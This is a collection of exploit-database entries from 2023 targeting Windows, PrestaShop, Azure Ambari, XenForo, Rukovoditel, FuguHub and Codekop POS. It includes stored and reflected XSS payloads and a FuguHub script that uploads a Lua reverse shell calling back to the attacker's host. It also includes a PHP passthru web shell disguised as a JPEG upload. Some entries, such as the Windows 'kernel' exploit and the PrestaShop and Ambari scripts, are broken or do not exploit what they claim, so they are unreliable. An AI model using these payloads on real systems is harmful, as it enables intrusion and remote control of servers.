// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : webapps // Vendor Homepage: // Tested on: Windows/Linux // CVE : CVE-2023-28293 #include <windows.h> #include <stdio.h> // The vulnerable driver file name const char *driver_name = "vuln_driver.sys"; // The vulnerable driver device name const char *device_name = "\\\\.\\VulnDriver"; // The IOCTL code to trigger the vulnerability #define IOCTL_VULN_CODE 0x222003 // The buffer size for the IOCTL input/output data #define IOCTL_BUFFER_SIZE 0x1000 int main() { HANDLE device; DWORD bytes_returned; char input_buffer[IOCTL_BUFFER_SIZE]; char output_buffer[IOCTL_BUFFER_SIZE]; // Load the vulnerable driver if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) { printf("Error loading vulnerable driver: %d\n", GetLastError()); return 1; } // Open the vulnerable driver device device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (device == INVALID_HANDLE_VALUE) { printf("Error opening vulnerable driver device: %d\n", GetLastError()); return 1; } // Fill the input buffer with data to trigger the vulnerability memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); // Send the IOCTL to trigger the vulnerability if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) { printf("Error sending IOCTL: %d\n", GetLastError()); return 1; } // Print the output buffer contents printf("Output buffer:\n%s\n", output_buffer); // Unload the vulnerable driver if (!UnloadDriver("\\Driver\\VulnDriver")) { printf("Error unloading vulnerable driver: %d\n", GetLastError()); return 1; } // Close the vulnerable driver device CloseHandle(device); return 0; } BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name) { SC_HANDLE sc_manager, service; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Create the service service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); if (service == NULL) { error = GetLastError(); if (error == ERROR_SERVICE_EXISTS) { // The service already exists, so open it instead service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } } else { CloseServiceHandle(sc_manager); return FALSE; } } // Start the service if (!StartService(service, 0, NULL)) { error = GetLastError(); if (error != ERROR_SERVICE_ALREADY_RUNNING) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } BOOL UnloadDriver(LPCTSTR service_name) { SC_HANDLE sc_manager, service; SERVICE_STATUS status; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Open the service service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } // Stop the service if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) { error = GetLastError(); if (error != ERROR_SERVICE_NOT_ACTIVE) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } // Delete the service if (!DeleteService(service)) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; }

# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory # Date: 2023-06-20 # Dork: /modules/winbizpayment/downloads/download.php # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html # Version: 17.1.3 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-30198 import requests import string import random # The base URL of the vulnerable site base_url = "http://example.com" # The URL of the login page login_url = base_url + "/authentication.php" # The username and password for the admin account username = "admin" password = "password123" # The URL of the vulnerable download.php file download_url = base_url + "/modules/winbizpayment/downloads/download.php" # The ID of the order to download order_id = 1234 # The path to save the downloaded file file_path = "/tmp/order_%d.pdf" % order_id # The session cookies to use for the requests session_cookies = None # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the login page to authenticate as the admin user login_data = {"email": username, "passwd": password, "csrf_token": csrf_token} session = requests.Session() response = session.post(login_url, data=login_data) # Save the session cookies for future requests session_cookies = session.cookies.get_dict() # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the download.php file to download the order PDF download_data = {"id_order": order_id, "csrf_token": csrf_token} response = session.post(download_url, cookies=session_cookies, data=download_data) # Save the downloaded file to disk with open(file_path, "wb") as f: f.write(response.content) # Print a message indicating that the file has been downloaded print("File downloaded to %s" % file_path)

# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : Remote # Vendor Homepage: Microsoft Apache Ambari Microsoft azure Hdinsights # Tested on: Windows/Linux # CVE : CVE-2023-23408 import requests # Set the URL and headers for the Ambari web interface url = "https://ambari.example.com/api/v1/clusters/cluster_name/services" headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"} # Define a function to validate the headers def validate_headers(headers): if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari": return False if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop": return False return True # Define a function to send a request to the Ambari web interface def send_request(url, headers): if not validate_headers(headers): print("Invalid headers") return response = requests.get(url, headers=headers) if response.status_code == 200: print("Request successful") else: print("Request failed") # Call the send_request function with the URL and headers send_request(url, headers)

# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS # Date: 2023-06-24 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: https://x.com/admin.php?smilies # Version: 2.2.12 (REQUIRED) # Tested on: Windows/Linux # CVE : ----------------------------------------------------------------------------- Requests POST /admin.php?smilie-categories/0/save HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/admin.php?smilies/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422 Content-Length: 1038 Origin: http://127.0.0.1 Connection: close Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616851,83fd2350307156281e51b17e20fe575b -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="title" <img src=x onerror=alert(document.domain)> -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="display_order" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfRequestUri" /admin.php?smilies/ -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfWithData" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616849,b74724a115448b864ba2db8f89f415f5 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfResponseType" json -----------------------------333176689514537912041638543422-- Response: After it is created, an alert comes immediately.

Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS Version: 3.4.1 Bugs: Multiple Stored XSS Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 24-06-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### ======================================== steps: 1. login to account 2. create project (http://localhost/index.php?module=items/items&path=21) 3. add task 4. open task 5. add comment as "<iframe src="https://14.rs"></iframe> " POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1 Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments= =========================== ###XSS-2### =========================== 1.go to admin account 2.go to configration => applicaton 3.Copyright Text set as "<img src=x onerror=alert(1)>" POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769 Content-Length: 2766 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=configuration/application Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="form_session_token" ju271AAoy1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NAME]" Rukovoditel -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]" ffgsdfgsdfg -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" ruko -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_LOGO"; filename="" Content-Type: application/octet-stream -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_FAVICON"; filename="" Content-Type: application/octet-stream -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FAVICON]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" <img src=x onerror=alert(1)> -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" english.php -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SKIN]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" America/New_York -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" 10 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" m/d/Y -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" m/d/Y H:i -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" 2/./* -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" 0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" 0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" 0 -----------------------------12298384558648010343132232769--

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Dork : /print.php?nm_member= # Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html # Tested on: Windows/Linux # CVE : CVE-2023-36346 import requests import urllib.parse # Set the target URL and payload url = "http://example.com/print.php" payload = "<script>alert('XSS')</script>" # Encode the payload for URL inclusion payload = urllib.parse.quote(payload) # Build the request parameters params = { "nm_member": payload } # Send the request and print the response response = requests.get(url, params=params) print(response.text)

# Exploit Title: FuguHub 8.1 - Remote Code Execution # Date: 6/24/2023 # Exploit Author: redfire359 # Vendor Homepage: https://fuguhub.com/ # Software Link: https://fuguhub.com/download.lsp # Version: 8.1 # Tested on: Ubuntu 22.04.1 # CVE : CVE-2023-24078 import requests from bs4 import BeautifulSoup import hashlib from random import randint from urllib3 import encode_multipart_formdata from urllib3.exceptions import InsecureRequestWarning import argparse from colorama import Fore requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) #Options for user registration, if no user has been created yet username = 'admin' password = 'password' email = '[email protected]' parser = argparse.ArgumentParser() parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True) parser.add_argument("-rp","--rport", help = "http port [Default 80]") parser.add_argument("-l","--lhost", help = "Your IP", required = True) parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True) args = parser.parse_args() LHOST = args.lhost LPORT = args.lport url = args.rhost if args.rport != None: port = args.rport else: port = 80 def main(): checkAccount() def checkAccount(): print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...") s = requests.Session() # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('h1') if r.status_code == 404: print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port") exit(0) userExists = False userText = 'User database already saved' for i in search: if i.string == userText: userExists = True if userExists: print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..") login(r,s) else: print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}") createUser(r,s) login(r,s) def createUser(r,s): data = { email : email , 'user' : username , 'password' : password , 'recoverpassword' : 'on' } r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data) print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!") def login(r,s): print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...") data = {'ba_username' : username , 'ba_password' : password} r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz #Veryify login login_Success_Title = 'Web-File-Server' soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('title') for i in search: if i != login_Success_Title: print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...") exploit(r,s) def exploit(r,s): #Find the file server, default is fs r = s.get(f"https://{url}:443/fs/cmsdocs/") code = r.status_code if code == 404: print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell") #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' file_content = f''' <h2> Check ur nc listener on the port you put in <h2> <?lsp if request:method() == "GET" then ?> <?lsp {shell} ?> <?lsp else ?> Wrong request method, goodBye! <?lsp end ?> ''' files = {'file': ('rev.lsp', file_content, 'application/octet-stream')} r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files) if r.text == 'ok' : print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ") r = s.get(f"https://{url}:443/rev.lsp") if __name__=='__main__': try: main() except: print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")

# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) # Date: 25-05-2023 # Exploit Author: yuyudhn # Vendor Homepage: https://www.codekop.com/ # Software Link: https://github.com/fauzan1892/pos-kasir-php # Version: 2.0 # Tested on: Linux # CVE: CVE-2023-36348 # Vulnerability description: The application does not sanitize the filename parameter when sending data to /fungsi/edit/edit.php?gambar=user. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. # Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/ # Proof of Concept: 1. Login to POS Codekop dashboard. 2. Go to profile settings. 3. Upload PHP script through Upload Profile Photo. Burp Log Example: ``` POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1 Host: localhost Content-Length: 8934 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" **Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-User: ?1** Sec-Fetch-Dest: document Referer: http://localhost/research/pos-kasir-php/index.php?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv Connection: close ------WebKitFormBoundarymVBHqH4m6KgKBnpa Content-Disposition: form-data; name="foto"; filename="asuka-rce.php" Content-Type: image/jpeg ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?> ÿÛC ----------------------------- ``` PHP Web Shell location: http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php